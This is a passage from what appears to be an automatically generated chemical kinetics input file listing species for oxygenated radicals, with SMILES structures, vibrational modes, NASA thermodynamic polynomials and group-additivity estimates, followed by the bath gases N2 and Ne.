energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.783626,0.0845546,-0.000152126,1.50551e-07,-5.63021e-11,24599.7,29.552], Tmin=(100,'K'), Tmax=(849.172,'K')), NASAPolynomial(coeffs=[3.04561,0.0422627,-2.1536e-05,4.15446e-09,-2.8573e-13,25356.2,25.7254], Tmin=(849.172,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(203.681,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(291.007,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(Cs_P) + radical(CCsJOCs) + radical(CCOJ) + radical(CCOJ)"""),
)
species(
label = 'C[CH]OC[C]([O])O[O](3383)',
structure = SMILES('C[CH]OC[C]([O])O[O]'),
E0 = (201.486,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,492.5,1135,1000,360,370,350,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (118.088,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.0071793,0.100651,-0.000175647,1.62942e-07,-5.77756e-11,24364.6,33.6933], Tmin=(100,'K'), Tmax=(854.611,'K')), NASAPolynomial(coeffs=[7.33727,0.0390158,-1.95045e-05,3.72262e-09,-2.54145e-13,24109.6,5.31986], Tmin=(854.611,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(201.486,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(311.793,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(Cs_P) + radical(ROOJ) + radical(CCOJ) + radical(CCsJOCs)"""),
)
species(
label = 'C[CH]O[CH][C]([O])OO(3380)',
structure = SMILES('C[CH]O[CH][C]([O])OO'),
E0 = (229.937,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3050,390,425,1340,1360,335,370,3615,1310,387.5,850,1000,360,370,350,2750,2800,2850,1350,1500,750,1050,1375,1000,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (118.088,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.566298,0.111339,-0.000190284,1.67376e-07,-5.68087e-11,27809,34.4395], Tmin=(100,'K'), Tmax=(847.24,'K')), NASAPolynomial(coeffs=[11.8025,0.0331267,-1.67276e-05,3.20325e-09,-2.19136e-13,26424.4,-18.9852], Tmin=(847.24,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(229.937,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(307.635,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(Cs_P) + radical(CCsJOCs) + radical(CCOJ) + radical(CCsJOCs)"""),
)
species(
label = '[CH2][CH]OC[C]([O])OO(1318)',
structure = SMILES('[CH2][CH]OC[C]([O])OO'),
E0 = (261.07,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3615,1310,387.5,850,1000,360,370,350,3000,3100,440,815,1455,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (118.088,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(4363.18,'J/mol'), sigma=(7.26495,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=681.52 K, Pc=25.82 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.416245,0.109517,-0.000191009,1.73267e-07,-6.04255e-11,31546.6,35.0879], Tmin=(100,'K'), Tmax=(845.45,'K')), NASAPolynomial(coeffs=[9.86044,0.0366864,-1.88389e-05,3.63424e-09,-2.49695e-13,30674.2,-7.64874], Tmin=(845.45,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(261.07,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(307.635,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOCs) + radical(Cs_P) + radical(CCOJ) + radical(CJCO)"""),
)
species(
label = 'CCO[CH]C(=O)OO(3938)',
structure = SMILES('CCO[CH]C(=O)OO'),
E0 = (-427.353,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.106634,0.0787705,-6.2667e-05,1.74188e-08,7.03891e-13,-51240.8,30.9202], Tmin=(100,'K'), Tmax=(1034.46,'K')), NASAPolynomial(coeffs=[20.2829,0.0205394,-8.11534e-06,1.52229e-09,-1.08858e-13,-56562,-73.4686], Tmin=(1034.46,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-427.353,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-O2s(Cds-O2d)) + group(O2s-OsH) + group(Cs-CsOsHH) + group(Cs-(Cds-O2d)OsHH) + group(Cs-CsHHH) + group(Cds-OdCsOs) + radical(CCsJOCs)"""),
)
species(
label = 'C=COCC([O])OO(3939)',
structure = SMILES('C=COCC([O])OO'),
E0 = (-248.355,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0136128,0.0846548,-8.62939e-05,4.40981e-08,-8.92105e-12,-29722.7,30.578], Tmin=(100,'K'), Tmax=(1197.6,'K')), NASAPolynomial(coeffs=[18.0395,0.0243577,-1.0772e-05,2.05774e-09,-1.4515e-13,-34046.8,-59.7732], Tmin=(1197.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-248.355,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cds-CdsOsH) + group(Cds-CdsHH) + radical(CCOJ)"""),
)
species(
label = 'CC1OCC1([O])OO(3633)',
structure = SMILES('CC1OCC1([O])OO'),
E0 = (-213.885,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.553262,0.0629183,-1.7997e-05,-3.32558e-08,2.16435e-11,-25588.2,25.2702], Tmin=(100,'K'), Tmax=(898.543,'K')), NASAPolynomial(coeffs=[18.4636,0.0188428,-3.94022e-06,4.76356e-10,-2.86769e-14,-30246.2,-67.2302], Tmin=(898.543,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-213.885,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(345.051,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsCsOsOs) + group(Cs-CsCsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + ring(Oxetane) + radical(CC(C)(O)OJ)"""),
)
species(
label = 'C[CH]OCC([O])([O])O(3940)',
structure = SMILES('C[CH]OCC([O])([O])O'),
E0 = (-181.943,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.151728,0.101261,-0.000183981,1.79278e-07,-6.53856e-11,-21760,32.9904], Tmin=(100,'K'), Tmax=(870.06,'K')), NASAPolynomial(coeffs=[3.4711,0.0469432,-2.29994e-05,4.33389e-09,-2.92803e-13,-20859.3,25.9341], Tmin=(870.06,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-181.943,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsOsOsOs) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CCOJ) + radical(CCsJOCs)"""),
)
species(
label = 'C[CH]OCC(=O)OO(3620)',
structure = SMILES('C[CH]OCC(=O)OO'),
E0 = (-427.353,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.106634,0.0787705,-6.2667e-05,1.74188e-08,7.03891e-13,-51240.8,30.9202], Tmin=(100,'K'), Tmax=(1034.46,'K')), NASAPolynomial(coeffs=[20.2829,0.0205394,-8.11534e-06,1.52229e-09,-1.08858e-13,-56562,-73.4686], Tmin=(1034.46,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-427.353,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-O2s(Cds-O2d)) + group(O2s-OsH) + group(Cs-CsOsHH) + group(Cs-(Cds-O2d)OsHH) + group(Cs-CsHHH) + group(Cds-OdCsOs) + radical(CCsJOCs)"""),
)
species(
label = '[O]C[C]([O])OO(1290)',
structure = SMILES('[O]C[C]([O])OO'),
E0 = (111.532,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,360,370,350,2750,2850,1437.5,1250,1305,750,350,180,1072.1,1072.24],'cm^-1')),
HinderedRotor(inertia=(0.136972,'amu*angstrom^2'), symmetry=1, barrier=(3.14926,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.136788,'amu*angstrom^2'), symmetry=1, barrier=(3.14502,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.13727,'amu*angstrom^2'), symmetry=1, barrier=(3.15612,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (91.0428,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.75747,0.0632199,-0.000128884,1.36882e-07,-5.32443e-11,13481.5,24.8972], Tmin=(100,'K'), Tmax=(849.128,'K')), NASAPolynomial(coeffs=[0.650466,0.0346903,-1.88763e-05,3.71198e-09,-2.57149e-13,14886,37.2201], Tmin=(849.128,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(111.532,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(195.39,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-CsH) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + radical(CCOJ) + radical(CCOJ) + radical(Cs_P)"""),
)
species(
label = '[CH]C(32)',
structure = SMILES('[CH]C'),
E0 = (351.472,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,431.535,1804.51],'cm^-1')),
HinderedRotor(inertia=(0.000906356,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (28.0532,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.73285,-0.000244773,3.59198e-05,-4.44289e-08,1.65887e-11,42287.5,7.078], Tmin=(100,'K'), Tmax=(940.479,'K')), NASAPolynomial(coeffs=[5.42969,0.0081677,-2.4253e-06,4.22642e-10,-3.09417e-14,41277.1,-4.6789], Tmin=(940.479,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(351.472,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(128.874,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCJ2_triplet)"""),
)
species(
label = '[O]O(16)',
structure = SMILES('[O]O'),
E0 = (-8.19602,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1036.72,2034.11,2034.11],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (33.0067,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(892.977,'J/mol'), sigma=(3.458,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.04595,-0.00173474,1.0377e-05,-1.02207e-08,3.3493e-12,-986.755,4.63579], Tmin=(100,'K'), Tmax=(932.129,'K')), NASAPolynomial(coeffs=[3.21022,0.00367946,-1.27704e-06,2.18051e-10,-1.46343e-14,-910.359,8.18305], Tmin=(932.129,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.19602,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsH) + group(O2s-OsH) + radical(HOOJ)"""),
)
species(
label = 'C[CH]OC[C][O](3848)',
structure = SMILES('C[CH]OC[C][O]'),
E0 = (433.949,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,200,800,1000,1200,1400,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (86.0892,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.841067,0.077601,-0.000127223,1.13628e-07,-3.95063e-11,52298,24.0656], Tmin=(100,'K'), Tmax=(843.113,'K')), NASAPolynomial(coeffs=[7.68677,0.0296787,-1.44869e-05,2.75808e-09,-1.88857e-13,51692.5,-4.53748], Tmin=(843.113,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(433.949,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(266.063,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-CsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CH2_triplet) + radical(CCsJOCs) + radical(CCOJ)"""),
)
species(
label = '[CH2]O[CH]C(415)',
structure = SMILES('[CH2]O[CH]C'),
E0 = (132.402,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000,3025,407.5,1350,352.5,345.442,350.885],'cm^-1')),
HinderedRotor(inertia=(0.00137711,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.00140962,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.101356,'amu*angstrom^2'), symmetry=1, barrier=(8.57158,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (58.0791,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.21733,0.0353185,-2.34142e-05,4.36902e-09,1.39093e-12,15992,16.6888], Tmin=(100,'K'), Tmax=(965.91,'K')), NASAPolynomial(coeffs=[9.14855,0.0150973,-5.18412e-06,8.78107e-10,-5.86112e-14,14257.3,-18.5582], Tmin=(965.91,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(132.402,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(220.334,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-OsHHH) + radical(CCsJOCs) + radical(CsJOCC)"""),
)
species(
label = '[O][C]OO(1370)',
structure = SMILES('[O][C]OO'),
E0 = (348.911,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,180,180],'cm^-1')),
HinderedRotor(inertia=(1.48901,'amu*angstrom^2'), symmetry=1, barrier=(34.2353,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(1.49006,'amu*angstrom^2'), symmetry=1, barrier=(34.2594,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (61.0168,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.49389,0.0282223,-2.75673e-05,9.42814e-09,-3.53743e-13,42022.8,13.2753], Tmin=(100,'K'), Tmax=(1048.36,'K')), NASAPolynomial(coeffs=[11.8829,0.000970194,-8.39185e-07,2.30595e-10,-2.0299e-14,39583.2,-34.7114], Tmin=(1048.36,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(348.911,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(99.7737,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-OsOsHH) + radical(OCOJ) + radical(CH2_triplet)"""),
)
species(
label = '[CH3](11)',
structure = SMILES('[CH3]'),
E0 = (135.382,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([570.572,1408.13,1408.49,4000,4000,4000],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (15.0345,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.91547,0.00184154,3.48742e-06,-3.32748e-09,8.49957e-13,16285.6,0.351741], Tmin=(100,'K'), Tmax=(1337.63,'K')), NASAPolynomial(coeffs=[3.54146,0.00476787,-1.82148e-06,3.28877e-10,-2.22546e-14,16224,1.66035], Tmin=(1337.63,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(135.382,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(108.088,'J/(mol*K)'), comment="""Thermo library: primaryThermoLibrary + radical(CH3)"""),
)
species(
label = '[CH]OC[C]([O])OO(2666)',
structure = SMILES('[CH]OC[C]([O])OO'),
E0 = (367.561,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,360,370,350,2750,2850,1437.5,1250,1305,750,350,200,800,960,1120,1280,1440,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (104.061,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.662505,0.0860301,-0.000160894,1.55501e-07,-5.70173e-11,44315.4,29.135], Tmin=(100,'K'), Tmax=(838.014,'K')), NASAPolynomial(coeffs=[6.07399,0.0332493,-1.81785e-05,3.5901e-09,-2.49745e-13,44354.7,9.63029], Tmin=(838.014,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(367.561,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(236.962,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-OsHHH) + radical(CCOJ) + radical(CH2_triplet) + radical(Cs_P)"""),
)
species(
label = 'C[C]OC[C]([O])OO(3941)',
structure = SMILES('C[C]OC[C]([O])OO'),
E0 = (330.013,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,360,370,350,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1000,1200,1400,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (118.088,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.134859,0.102807,-0.000175874,1.62353e-07,-5.83898e-11,39828.9,32.7291], Tmin=(100,'K'), Tmax=(819.709,'K')), NASAPolynomial(coeffs=[8.31294,0.0398883,-2.10383e-05,4.13781e-09,-2.88842e-13,39172.8,-1.90128], Tmin=(819.709,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(330.013,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(307.635,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CH2_triplet) + radical(Cs_P) + radical(CCOJ)"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.64289,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.53101,-0.000123661,-5.02999e-07,2.43531e-09,-1.40881e-12,-1046.98,2.96747], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.95258,0.0013969,-4.92632e-07,7.8601e-11,-4.60755e-15,-923.949,5.87189], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-8.64289,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
